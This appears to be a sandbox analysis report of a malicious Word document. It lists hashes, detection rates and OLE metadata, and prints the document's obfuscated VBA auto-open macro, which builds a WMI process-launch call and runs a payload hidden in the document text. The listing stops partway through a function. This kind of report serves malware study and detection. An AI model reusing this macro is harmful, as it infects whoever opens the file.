                                                                      MD5:039810A34BE3DD45B9D30F89E18F46F4
                                                                      SHA1:5F8609A2DB33D6BB70584E1741F428245474146F
                                                                      SHA-256:A9DD98F4B6FE0B997F8B3D50F1CA405F02583A02133874FE123EAEA6C22DAB00
                                                                      SHA-512:8ACA60103958AA461A91F708E0E41A401F316161DEFE9525560AC2E03AEA3566E01F0825410E678B0C76DA7551CE48C2200D01380810CF70AC75F9CC91BCF9FF
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: Metadefender, Detection: 46%
                                                                      • Antivirus: ReversingLabs, Detection: 86%
                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.`...........!...2.@..........P........P...............................................................................`..d....................T..X............................................................a..`............................text....6.......8.................. ..`.rdata..W....P.......<..............@..@.data........`.......>..............@....text4.......p.......B..............@....text8..d............H.............. ..@.text7..d............J.............. ..@.text6..d............L.............. ..@.text5..d............N.............. ..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: -535, Keywords: 155, Comments: 43, Thumbnail: 21890, 0x17: 917504
                                                                      CDFV2 Microsoft Word
                                                                      Entropy (8bit):6.828949606327576
                                                                      TrID:
                                                                      • Microsoft Word document (32009/1) 79.99%
                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                                      File name:ARCHIVOFile-20-012021.doc
                                                                      File size:163328
                                                                      MD5:d4829a31da294d0ee8f9f67bc1352bd2
                                                                      SHA1:70601272023fd5285194c68da776708508524d50
                                                                      SHA256:4fc909106f65c1ca7c9073743cbc8a7513a4ce7ae3d04e38bd01847e96aaf9f5
                                                                      SHA512:4a3e4ba0671890787590e7abb39dbea6e4b70334d6b7ee8aafb9559184c3d650cf8a04711ba3e863b675afb400c9c8512bbd85393ee89cf359766831a6581d1d
                                                                      SSDEEP:3072:1/X2TdcrrXyQBsc0vWJVi4IrwVOfMb2Y/:1/PPIIx2Y

                                                                      File Icon

                                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                                      Static OLE Info

                                                                      General

                                                                      Document Type:OLE
                                                                      Number of OLE Files:1

                                                                      OLE File "ARCHIVOFile-20-012021.doc"

                                                                      Indicators

                                                                      Has Summary Info:True
                                                                      Application Name:unknown
                                                                      Encrypted Document:False
                                                                      Contains Word Document Stream:True
                                                                      Contains Workbook/Book Stream:False
                                                                      Contains PowerPoint Document Stream:False
                                                                      Contains Visio Document Stream:False
                                                                      Contains ObjectPool Stream:
                                                                      Flash Objects Count:
                                                                      Contains VBA Macros:True

                                                                      Document Summary

                                                                      Document Code Page:-535
                                                                      Number of Lines:155
                                                                      Number of Paragraphs:43
                                                                      Thumbnail Scaling Desired:False
                                                                      Company:
                                                                      Contains Dirty Links:False
                                                                      Shared Document:False
                                                                      Changed Hyperlinks:False
                                                                      Application Version:917504

                                                                      Streams with VBA

                                                                      VBA File Name: Bcur5699z4d, Stream Size: 1108
                                                                      General
                                                                      Stream Path:Macros/VBA/Bcur5699z4d
                                                                      VBA File Name:Bcur5699z4d
                                                                      Stream Size:1108

                                                                      VBA Code Keywords

                                                                      Keyword
                                                                      Xqcxarraokjbi
                                                                      False
                                                                      Private
                                                                      VB_Exposed
                                                                      Attribute
                                                                      VB_Creatable
                                                                      VB_Name
                                                                      Document_open()
                                                                      VB_Customizable
                                                                      VB_PredeclaredId
                                                                      VB_GlobalNameSpace
                                                                      VB_Base
                                                                      VB_TemplateDerived
                                                                      VBA Code
                                                                      Attribute VB_Name = "Bcur5699z4d"
                                                                      Attribute VB_Base = "1Normal.ThisDocument"
                                                                      Attribute VB_GlobalNameSpace = False
                                                                      Attribute VB_Creatable = False
                                                                      Attribute VB_PredeclaredId = True
                                                                      Attribute VB_Exposed = True
                                                                      Attribute VB_TemplateDerived = True
                                                                      Attribute VB_Customizable = True
                                                                      Private Sub Document_open()
                                                                      Xqcxarraokjbi
                                                                      End Sub
                                                                      VBA File Name: Nst6otvnmgmpw, Stream Size: 17602
                                                                      General
                                                                      Stream Path:Macros/VBA/Nst6otvnmgmpw
                                                                      VBA File Name:Nst6otvnmgmpw
                                                                      Stream Size:17602

                                                                      VBA Code Keywords

                                                                      Keyword
                                                                      crnYCaC
                                                                      RYtzeF
                                                                      ClofCvn
                                                                      BlbPRi:
                                                                      Left(vpWmJA.Range.ParagraphStyle,
                                                                      BlbPRi)
                                                                      kBCITgNAC.Range.ListFormat.ListString
                                                                      aqFpElJ
                                                                      tFspDCJEJ
                                                                      djUnAEBd.Range.ParagraphStyle
                                                                      QjbRmCII
                                                                      rknGHpIJ
                                                                      RmTjACo
                                                                      jdDhS
                                                                      ah_sg
                                                                      InStr(kBCITgNAC.Range.Text,
                                                                      MscjBIE.Range.ParagraphStyle
                                                                      sDmVCG
                                                                      TpAnAB.Range.Text
                                                                      dUBsAD
                                                                      ORjdHplF.Range.Text
                                                                      ueWFHDCC
                                                                      QpteDQ
                                                                      wNsHseJob
                                                                      DagVrchHi.Range.Text
                                                                      NcnmJ
                                                                      aiupjCA.Range.ParagraphStyle
                                                                      pbPXFg
                                                                      SeBOI
                                                                      wgusFA
                                                                      VrghdcJA.Range.Text
                                                                      vXdLFECJ
                                                                      ElseIf
                                                                      pbPXFg.Range.ParagraphStyle
                                                                      mWRkEDBn
                                                                      swJREBktH
                                                                      Len("xxx"))
                                                                      DagVrchHi
                                                                      GvZhcxcBE.Range.ListFormat.ListString
                                                                      clyZlt.Range.ParagraphStyle
                                                                      kBCITgNAC.Range.Text
                                                                      QurlJAjI
                                                                      ah:wsg
                                                                      Left(ORjdHplF.Range.ParagraphStyle,
                                                                      EGxLDh
                                                                      ifZhJxP
                                                                      BdbvZ
                                                                      InStr(KekJrc.Range.Text,
                                                                      SEEmDH
                                                                      ihnSRH
                                                                      djUnAEBd.Range.Text
                                                                      kYUGGMJ.Range.ListFormat.ListString
                                                                      JJqbCtEH
                                                                      ahpsg
                                                                      InStr(MscjBIE.Range.Text,
                                                                      ZBXzADzi
                                                                      dPYykYG
                                                                      InStr(TpAnAB.Range.Text,
                                                                      TpAnAB.Range.ListFormat.ListString
                                                                      Replace(saw,
                                                                      kBCITgNAC.Range.ParagraphStyle
                                                                      ilrmFI
                                                                      QyjOFbQGB
                                                                      Left(GvZhcxcBE.Range.ParagraphStyle,
                                                                      IGyeHIDF
                                                                      DMzpFn
                                                                      MFcvbrIeP
                                                                      WHeXGpVAC
                                                                      nWADOALQ
                                                                      ORjdHplF.Range.ParagraphStyle
                                                                      clyLjDhC
                                                                      oSnKJGCv
                                                                      ODMoFC)
                                                                      CJIuIYEKI
                                                                      KoPDIC
                                                                      gnnIFFf
                                                                      djUnAEBd.Range.ListFormat.ListString
                                                                      XSZpp
                                                                      QrQLEAI
                                                                      hnsxGG
                                                                      tfnHGB
                                                                      LCIxEHv
                                                                      ORjdHplF.Range.ListFormat.ListString
                                                                      Resume
                                                                      vpWmJA.Range.ParagraphStyle
                                                                      InStr(clyZlt.Range.Text,
                                                                      PAyxzTsC
                                                                      dwTYCJwLC)
                                                                      GLKaFEDcX
                                                                      PEaiK.Range.Text
                                                                      zjQpkF
                                                                      KekJrc.Range.ListFormat.ListString
                                                                      wJKPQpiH
                                                                      Left(kYUGGMJ.Range.ParagraphStyle,
                                                                      ruwfBB
                                                                      QrQLEAI:
                                                                      GHJmFFAIm)
                                                                      golkzCJBD
                                                                      FdSuG
                                                                      OtoVEFFI
                                                                      QrQLEAI)
                                                                      "hqkwjbjdasd"
                                                                      GHJmFFAIm:
                                                                      LEeUqk
                                                                      Left(clyZlt.Range.ParagraphStyle,
                                                                      ZAXDGY
                                                                      KnxFzdf
                                                                      kYUGGMJ.Range.ParagraphStyle
                                                                      ubHTxDED
                                                                      LqcVa
                                                                      Left(djUnAEBd.Range.ParagraphStyle,
                                                                      aqFpElJ.Range.Text
                                                                      GvZhcxcBE
                                                                      twfalBEJ
                                                                      HmUuEIbVG
                                                                      KekJrc.Range.Text
                                                                      vpWmJA.Range.Text
                                                                      iGMIJABIz
                                                                      uRNYED
                                                                      ORjdHplF
                                                                      DrqvEr
                                                                      LGONCIz
                                                                      Left(MscjBIE.Range.ParagraphStyle,
                                                                      kyTwIN
                                                                      wTLHBUFzI
                                                                      wNsHseJob.Range.ParagraphStyle
                                                                      WLdYLJOB
                                                                      YfXWF
                                                                      VrzOGkkDJ
                                                                      EWTFmUdCA
                                                                      dUBsAD)
                                                                      KekJrc
                                                                      sVBjGLE
                                                                      dUBsAD:
                                                                      xWqeABhHw
                                                                      bssipAJC
                                                                      Left(pbPXFg.Range.ParagraphStyle,
                                                                      GvZhcxcBE.Range.ParagraphStyle
                                                                      Xqcxarraokjbi()
                                                                      BApwTCG
                                                                      ahgmsg
                                                                      VB_Name
                                                                      CzpmH
                                                                      wTHGJGJ
                                                                      VrghdcJA.Range.ListFormat.ListString
                                                                      wZFCUdE)
                                                                      BRoZbEF
                                                                      wZFCUdE:
                                                                      IEHycIT
                                                                      aqFpElJ.Range.ParagraphStyle
                                                                      "xxxx"
                                                                      bxSXGCyrq
                                                                      rQGxCbRtR
                                                                      aqFpElJ.Range.ListFormat.ListString
                                                                      Mid(Application.Name,
                                                                      InStr(aqFpElJ.Range.Text,
                                                                      aNLHyKGxD
                                                                      InStr(kYUGGMJ.Range.Text,
                                                                      NirTjIE
                                                                      Left(DagVrchHi.Range.ParagraphStyle,
                                                                      aJzPBis.Range.ListFormat.ListString
                                                                      ODMoFC
                                                                      CJIuIYEKI)
                                                                      HwQjGFBhp
                                                                      VrghdcJA.Range.ParagraphStyle
                                                                      CJIuIYEKI:
                                                                      qOgvIXcc
                                                                      PIEpnIEQ
                                                                      InStr(wNsHseJob.Range.Text,
                                                                      TpAnAB.Range.ParagraphStyle
                                                                      AZyYMo
                                                                      RpARJ
                                                                      Paragraph
                                                                      ODMoFC:
                                                                      InStr(aJzPBis.Range.Text,
                                                                      YfXWF)
                                                                      BlbPRi
                                                                      BApwTCG.Range.ParagraphStyle
                                                                      KekJrc.Range.ParagraphStyle
                                                                      xmKhhI
                                                                      Left(PEaiK.Range.ParagraphStyle,
                                                                      PEaiK.Range.ListFormat.ListString
                                                                      ahinsg
                                                                      polxC
                                                                      ahmsg
                                                                      clyZlt.Range.Text
                                                                      vpWmJA.Range.ListFormat.ListString
                                                                      dwTYCJwLC:
                                                                      JozvGJc
                                                                      BApwTCG.Range.ListFormat.ListString
                                                                      ahssg
                                                                      rlKgn
                                                                      PEaiK
                                                                      Left(wNsHseJob.Range.ParagraphStyle,
                                                                      aJzPBis
                                                                      chPFBOFy
                                                                      PyQuEPBH
                                                                      QxPrAc
                                                                      wZFCUdE
                                                                      lSOmIHg
                                                                      GHJmFFAIm
                                                                      gzBJqD
                                                                      BApwTCG.Range.Text
                                                                      yVvECoEYV
                                                                      Left(BApwTCG.Range.ParagraphStyle,
                                                                      InStr(VrghdcJA.Range.Text,
                                                                      Left(KekJrc.Range.ParagraphStyle,
                                                                      Left(aJzPBis.Range.ParagraphStyle,
                                                                      hnsxGG)
                                                                      InStr(BApwTCG.Range.Text,
                                                                      AYQZHEBI
                                                                      elbdiLVN
                                                                      vttGko
                                                                      aiupjCA.Range.ListFormat.ListString
                                                                      InStr(vpWmJA.Range.Text,
                                                                      DagVrchHi.Range.ParagraphStyle
                                                                      PIEpnIEQ)
                                                                      dueIMGo
                                                                      GvZhcxcBE.Range.Text
                                                                      PIEpnIEQ:
                                                                      InStr(pbPXFg.Range.Text,
                                                                      DdtFCGIA
                                                                      Left(VrghdcJA.Range.ParagraphStyle,
                                                                      MscjBIE.Range.Text
                                                                      HgufGDBpC
                                                                      BjqtUGzGV
                                                                      "kkiew")
                                                                      LATJAGVFG
                                                                      fishDz
                                                                      Function
                                                                      InStr(PEaiK.Range.Text,
                                                                      IpndaHM
                                                                      "sjgwb",
                                                                      jhoJOEJc
                                                                      QyjOFbQGB)
                                                                      VBA Code
                                                                      Attribute VB_Name = "Nst6otvnmgmpw"
                                                                      Function Xqcxarraokjbi()
                                                                      On Error Resume Next
                                                                      V1 = O9eax2mx6bn5xuv + Bcur5699z4d.Content + Bud375u79tqnjtr8hp
                                                                         GoTo hnsxGG
                                                                           Dim vpWmJA As Paragraph
                                                                      Set HwQjGFBhp = bebkDqAH
                                                                           For Each vpWmJA In Bcur5699z4d.Paragraphs
                                                                      Set yVvECoEYV = EWTFmUdCA
                                                                             If Left(vpWmJA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               hnsxGG = vpWmJA.Range.ListFormat.ListString
                                                                             ElseIf InStr(vpWmJA.Range.Text, "kkiew") > 1 Then
                                                                               elbdiLVN = vpWmJA.Range.Text
                                                                               elbdiLVN = Replace(saw, "sjgwb", "hqkwjbjdasd" & hnsxGG)
                                                                               vpWmJA.Range.Text = elbdiLVN
                                                                               Set vpWmJA.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set BdbvZ = ueWFHDCC
                                                                           Next vpWmJA
                                                                      hnsxGG:
                                                                      U7 = "sg yw ahpsg yw ah"
                                                                      Xa6pbm6di_vp9mwl = "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"
                                                                         GoTo GHJmFFAIm
                                                                           Dim ORjdHplF As Paragraph
                                                                      Set twfalBEJ = yigPu
                                                                           For Each ORjdHplF In Bcur5699z4d.Paragraphs
                                                                      Set ATQXIsF = wTLHBUFzI
                                                                             If Left(ORjdHplF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               GHJmFFAIm = ORjdHplF.Range.ListFormat.ListString
                                                                             ElseIf InStr(ORjdHplF.Range.Text, "kkiew") > 1 Then
                                                                               JozvGJc = ORjdHplF.Range.Text
                                                                               JozvGJc = Replace(saw, "sjgwb", "hqkwjbjdasd" & GHJmFFAIm)
                                                                               ORjdHplF.Range.Text = JozvGJc
                                                                               Set ORjdHplF.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set QxPrAc = oSnKJGCv
                                                                           Next ORjdHplF
                                                                      GHJmFFAIm:
                                                                      Jziyk2numi4eksqusj = "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"
                                                                         GoTo GLKaFEDcX
                                                                           Dim kYUGGMJ As Paragraph
                                                                      Set RpARJ = NVFQOFAXs
                                                                           For Each kYUGGMJ In Bcur5699z4d.Paragraphs
                                                                      Set hHdBIMIgE = KoPDIC
                                                                             If Left(kYUGGMJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               GLKaFEDcX = kYUGGMJ.Range.ListFormat.ListString
                                                                             ElseIf InStr(kYUGGMJ.Range.Text, "kkiew") > 1 Then
                                                                               TpXhGgIp = kYUGGMJ.Range.Text
                                                                               TpXhGgIp = Replace(saw, "sjgwb", "hqkwjbjdasd" & GLKaFEDcX)
                                                                               kYUGGMJ.Range.Text = TpXhGgIp
                                                                               Set kYUGGMJ.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set iGMIJABIz = vlZuYFCC
                                                                           Next kYUGGMJ
                                                                      GLKaFEDcX:
                                                                      Kdpt7ybnm0buk = "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"
                                                                         GoTo QyjOFbQGB
                                                                           Dim wNsHseJob As Paragraph
                                                                      Set crnYCaC = mJzxEXG
                                                                           For Each wNsHseJob In Bcur5699z4d.Paragraphs
                                                                      Set FdSuG = bssipAJC
                                                                             If Left(wNsHseJob.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               QyjOFbQGB = wNsHseJob.Range.ListFormat.ListString
                                                                             ElseIf InStr(wNsHseJob.Range.Text, "kkiew") > 1 Then
                                                                               DrqvEr = wNsHseJob.Range.Text
                                                                               DrqvEr = Replace(saw, "sjgwb", "hqkwjbjdasd" & QyjOFbQGB)
                                                                               wNsHseJob.Range.Text = DrqvEr
                                                                               Set wNsHseJob.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set HgufGDBpC = IpndaHM
                                                                           Next wNsHseJob
                                                                      QyjOFbQGB:
                                                                      T_b71hsugbvq289o = "sg yw ahsg yw ah" + Mid(Application.Name, 3 + 3, 1 / 1) + "sg yw ahsg yw ah"
                                                                         GoTo DMzpFn
                                                                           Dim MscjBIE As Paragraph
                                                                      Set AZyYMo = lscaG
                                                                           For Each MscjBIE In Bcur5699z4d.Paragraphs
                                                                      Set cLxQFB = wgusFA
                                                                             If Left(MscjBIE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               DMzpFn = MscjBIE.Range.ListFormat.ListString
                                                                             ElseIf InStr(MscjBIE.Range.Text, "kkiew") > 1 Then
                                                                               RxTZR = MscjBIE.Range.Text
                                                                               RxTZR = Replace(saw, "sjgwb", "hqkwjbjdasd" & DMzpFn)
                                                                               MscjBIE.Range.Text = RxTZR
                                                                               Set MscjBIE.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set jdDhS = HpOdl
                                                                           Next MscjBIE
                                                                      DMzpFn:
                                                                      Iybdpqjdde6_svpju7 = Kdpt7ybnm0buk + T_b71hsugbvq289o + Jziyk2numi4eksqusj + U7 + Xa6pbm6di_vp9mwl
                                                                         GoTo uRNYED
                                                                           Dim GvZhcxcBE As Paragraph
                                                                      Set WLdYLJOB = PAyxzTsC
                                                                           For Each GvZhcxcBE In Bcur5699z4d.Paragraphs
                                                                      Set RYtzeF = sVBjGLE
                                                                             If Left(GvZhcxcBE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               uRNYED = GvZhcxcBE.Range.ListFormat.ListString
                                                                             ElseIf InStr(GvZhcxcBE.Range.Text, "kkiew") > 1 Then
                                                                               mNAmBCKAC = GvZhcxcBE.Range.Text
                                                                               mNAmBCKAC = Replace(saw, "sjgwb", "hqkwjbjdasd" & uRNYED)
                                                                               GvZhcxcBE.Range.Text = mNAmBCKAC
                                                                               Set GvZhcxcBE.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set kFOCACABC = RmTjACo
                                                                           Next GvZhcxcBE
                                                                      uRNYED:
                                                                      H7kfpfj7v13k0 = Yvxv3g2kutodnaylkq(Iybdpqjdde6_svpju7)
                                                                         GoTo clyLjDhC
                                                                           Dim VrghdcJA As Paragraph
                                                                      Set kyTwIN = zjQpkF
                                                                           For Each VrghdcJA In Bcur5699z4d.Paragraphs
                                                                      Set xmKhhI = ClofCvn
                                                                             If Left(VrghdcJA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               clyLjDhC = VrghdcJA.Range.ListFormat.ListString
                                                                             ElseIf InStr(VrghdcJA.Range.Text, "kkiew") > 1 Then
                                                                               LATJAGVFG = VrghdcJA.Range.Text
                                                                               LATJAGVFG = Replace(saw, "sjgwb", "hqkwjbjdasd" & clyLjDhC)
                                                                               VrghdcJA.Range.Text = LATJAGVFG
                                                                               Set VrghdcJA.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set IyCjJCAKS = tFspDCJEJ
                                                                           Next VrghdcJA
                                                                      clyLjDhC:
                                                                      Set W71k24g1fo31hq05ui = CreateObject(H7kfpfj7v13k0)
                                                                         GoTo CJIuIYEKI
                                                                           Dim djUnAEBd As Paragraph
                                                                      Set nATRHnACI = rknGHpIJ
                                                                           For Each djUnAEBd In Bcur5699z4d.Paragraphs
                                                                      Set PyQuEPBH = LGONCIz
                                                                             If Left(djUnAEBd.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               CJIuIYEKI = djUnAEBd.Range.ListFormat.ListString
                                                                             ElseIf InStr(djUnAEBd.Range.Text, "kkiew") > 1 Then
                                                                               gnnIFFf = djUnAEBd.Range.Text
                                                                               gnnIFFf = Replace(saw, "sjgwb", "hqkwjbjdasd" & CJIuIYEKI)
                                                                               djUnAEBd.Range.Text = gnnIFFf
                                                                               Set djUnAEBd.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set AYQZHEBI = chPFBOFy
                                                                           Next djUnAEBd
                                                                      CJIuIYEKI:
                                                                      KK = Yvxv3g2kutodnaylkq(Mid(V1, (4), Len(V1)))
                                                                      W71k24g1fo31hq05ui.Create KK, Twt08i5xpa9fd0, L1e1dxo2wbinf3l6
                                                                         GoTo wZFCUdE
                                                                           Dim clyZlt As Paragraph
                                                                      Set JJqbCtEH = rlKgn
                                                                           For Each clyZlt In Bcur5699z4d.Paragraphs
                                                                      Set DdtFCGIA = igIuH
                                                                             If Left(clyZlt.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               wZFCUdE = clyZlt.Range.ListFormat.ListString
                                                                             ElseIf InStr(clyZlt.Range.Text, "kkiew") > 1 Then
                                                                               dPYykYG = clyZlt.Range.Text
                                                                               dPYykYG = Replace(saw, "sjgwb", "hqkwjbjdasd" & wZFCUdE)
                                                                               clyZlt.Range.Text = dPYykYG
                                                                               Set clyZlt.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set OnCoGHI = QgrUG
                                                                           Next clyZlt
                                                                      wZFCUdE:
                                                                      End Function
                                                                      Function Yvxv3g2kutodnaylkq(T3bxybxcdn5d)
                                                                      On Error Resume Next
                                                                         GoTo zfIxDdGy
                                                                           Dim KekJrc As Paragraph
                                                                      Set mWRkEDBn = nWADOALQ
                                                                           For Each KekJrc In Bcur5699z4d.Paragraphs
                                                                      Set jhoJOEJc = EqstFcEf
                                                                             If Left(KekJrc.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               zfIxDdGy = KekJrc.Range.ListFormat.ListString
                                                                             ElseIf InStr(KekJrc.Range.Text, "kkiew") > 1 Then
                                                                               rvAquNI = KekJrc.Range.Text
                                                                               rvAquNI = Replace(saw, "sjgwb", "hqkwjbjdasd" & zfIxDdGy)
                                                                               KekJrc.Range.Text = rvAquNI
                                                                               Set KekJrc.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set QpteDQ = CITOv
                                                                           Next KekJrc
                                                                      zfIxDdGy:
                                                                      Zonfu7wvfwo = T3bxybxcdn5d
                                                                         GoTo QrQLEAI
                                                                           Dim aJzPBis As Paragraph
                                                                      Set EGxLDh = swJREBktH
                                                                           For Each aJzPBis In Bcur5699z4d.Paragraphs
                                                                      Set uqBHEDw = MllKTIJEc
                                                                             If Left(aJzPBis.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               QrQLEAI = aJzPBis.Range.ListFormat.ListString
                                                                             ElseIf InStr(aJzPBis.Range.Text, "kkiew") > 1 Then
                                                                               golkzCJBD = aJzPBis.Range.Text
                                                                               golkzCJBD = Replace(saw, "sjgwb", "hqkwjbjdasd" & QrQLEAI)
                                                                               aJzPBis.Range.Text = golkzCJBD
                                                                               Set aJzPBis.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set qOgvIXcc = fishDz
                                                                           Next aJzPBis
                                                                      QrQLEAI:
                                                                      Mgpwbt669dipg22hz = Hbs0geilvqul(Zonfu7wvfwo)
                                                                         GoTo VGSqAr
                                                                           Dim kBCITgNAC As Paragraph
                                                                      Set vXdLFECJ = xvhwEkIi
                                                                           For Each kBCITgNAC In Bcur5699z4d.Paragraphs
                                                                      Set SeBOI = vYqwDI
                                                                             If Left(kBCITgNAC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               VGSqAr = kBCITgNAC.Range.ListFormat.ListString
                                                                             ElseIf InStr(kBCITgNAC.Range.Text, "kkiew") > 1 Then
                                                                               bxSXGCyrq = kBCITgNAC.Range.Text
                                                                               bxSXGCyrq = Replace(saw, "sjgwb", "hqkwjbjdasd" & VGSqAr)
                                                                               kBCITgNAC.Range.Text = bxSXGCyrq
                                                                               Set kBCITgNAC.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set LqcVa = MFcvbrIeP
                                                                           Next kBCITgNAC
                                                                      VGSqAr:
                                                                      Yvxv3g2kutodnaylkq = Mgpwbt669dipg22hz
                                                                         GoTo ODMoFC
                                                                           Dim PEaiK As Paragraph
                                                                      Set ihnSRH = HmUuEIbVG
                                                                           For Each PEaiK In Bcur5699z4d.Paragraphs
                                                                      Set sDmVCG = gzBJqD
                                                                             If Left(PEaiK.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               ODMoFC = PEaiK.Range.ListFormat.ListString
                                                                             ElseIf InStr(PEaiK.Range.Text, "kkiew") > 1 Then
                                                                               NcnmJ = PEaiK.Range.Text
                                                                               NcnmJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & ODMoFC)
                                                                               PEaiK.Range.Text = NcnmJ
                                                                               Set PEaiK.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set CzpmH = polxC
                                                                           Next PEaiK
                                                                      ODMoFC:
                                                                      End Function
                                                                      Function Hbs0geilvqul(Cxe014lg73v5)
                                                                         GoTo dUBsAD
                                                                           Dim TpAnAB As Paragraph
                                                                      Set IEHycIT = ZBXzADzi
                                                                           For Each TpAnAB In Bcur5699z4d.Paragraphs
                                                                      Set BRoZbEF = ZAXDGY
                                                                             If Left(TpAnAB.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               dUBsAD = TpAnAB.Range.ListFormat.ListString
                                                                             ElseIf InStr(TpAnAB.Range.Text, "kkiew") > 1 Then
                                                                               FTbqcNF = TpAnAB.Range.Text
                                                                               FTbqcNF = Replace(saw, "sjgwb", "hqkwjbjdasd" & dUBsAD)
                                                                               TpAnAB.Range.Text = FTbqcNF
                                                                               Set TpAnAB.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set bEIjwUFFB = EBTVGH
                                                                           Next TpAnAB
                                                                      dUBsAD:
                                                                         GoTo ruwfBB
                                                                           Dim BApwTCG As Paragraph
                                                                      Set ubHTxDED = ilrmFI
                                                                           For Each BApwTCG In Bcur5699z4d.Paragraphs
                                                                      Set dueIMGo = zhliJ
                                                                             If Left(BApwTCG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               ruwfBB = BApwTCG.Range.ListFormat.ListString
                                                                             ElseIf InStr(BApwTCG.Range.Text, "kkiew") > 1 Then
                                                                               jVymJ = BApwTCG.Range.Text
                                                                               jVymJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & ruwfBB)
                                                                               BApwTCG.Range.Text = jVymJ
                                                                               Set BApwTCG.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set XSZpp = DvhBN
                                                                           Next BApwTCG
                                                                      ruwfBB:
                                                                         GoTo BlbPRi
                                                                           Dim pbPXFg As Paragraph
                                                                      Set lSOmIHg = wHzvQRHCw
                                                                           For Each pbPXFg In Bcur5699z4d.Paragraphs
                                                                      Set vttGko = OtoVEFFI
                                                                             If Left(pbPXFg.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               BlbPRi = pbPXFg.Range.ListFormat.ListString
                                                                             ElseIf InStr(pbPXFg.Range.Text, "kkiew") > 1 Then
                                                                               SEEmDH = pbPXFg.Range.Text
                                                                               SEEmDH = Replace(saw, "sjgwb", "hqkwjbjdasd" & BlbPRi)
                                                                               pbPXFg.Range.Text = SEEmDH
                                                                               Set pbPXFg.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set IGyeHIDF = tfnHGB
                                                                           Next pbPXFg
                                                                      BlbPRi:
                                                                      Hbs0geilvqul = Replace(Cxe014lg73v5, "sg yw ah", Zn5_1mdwh2kp2)
                                                                         GoTo YfXWF
                                                                           Dim aiupjCA As Paragraph
                                                                      Set HFzCp = aNLHyKGxD
                                                                           For Each aiupjCA In Bcur5699z4d.Paragraphs
                                                                      Set NrnOEeCi = VrzOGkkDJ
                                                                             If Left(aiupjCA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               YfXWF = aiupjCA.Range.ListFormat.ListString
                                                                             ElseIf InStr(aiupjCA.Range.Text, "kkiew") > 1 Then
                                                                               EiZIHkBmm = aiupjCA.Range.Text
                                                                               EiZIHkBmm = Replace(saw, "sjgwb", "hqkwjbjdasd" & YfXWF)
                                                                               aiupjCA.Range.Text = EiZIHkBmm
                                                                               Set aiupjCA.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set LCIxEHv = ykoqBxAG
                                                                           Next aiupjCA
                                                                      YfXWF:
                                                                         GoTo dwTYCJwLC
                                                                           Dim aqFpElJ As Paragraph
                                                                      Set aiaDHfVAA = BjqtUGzGV
                                                                           For Each aqFpElJ In Bcur5699z4d.Paragraphs
                                                                      Set WHeXGpVAC = LEeUqk
                                                                             If Left(aqFpElJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               dwTYCJwLC = aqFpElJ.Range.ListFormat.ListString
                                                                             ElseIf InStr(aqFpElJ.Range.Text, "kkiew") > 1 Then
                                                                               wTHGJGJ = aqFpElJ.Range.Text
                                                                               wTHGJGJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & dwTYCJwLC)
                                                                               aqFpElJ.Range.Text = wTHGJGJ
                                                                               Set aqFpElJ.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set KnxFzdf = wuVfVIU
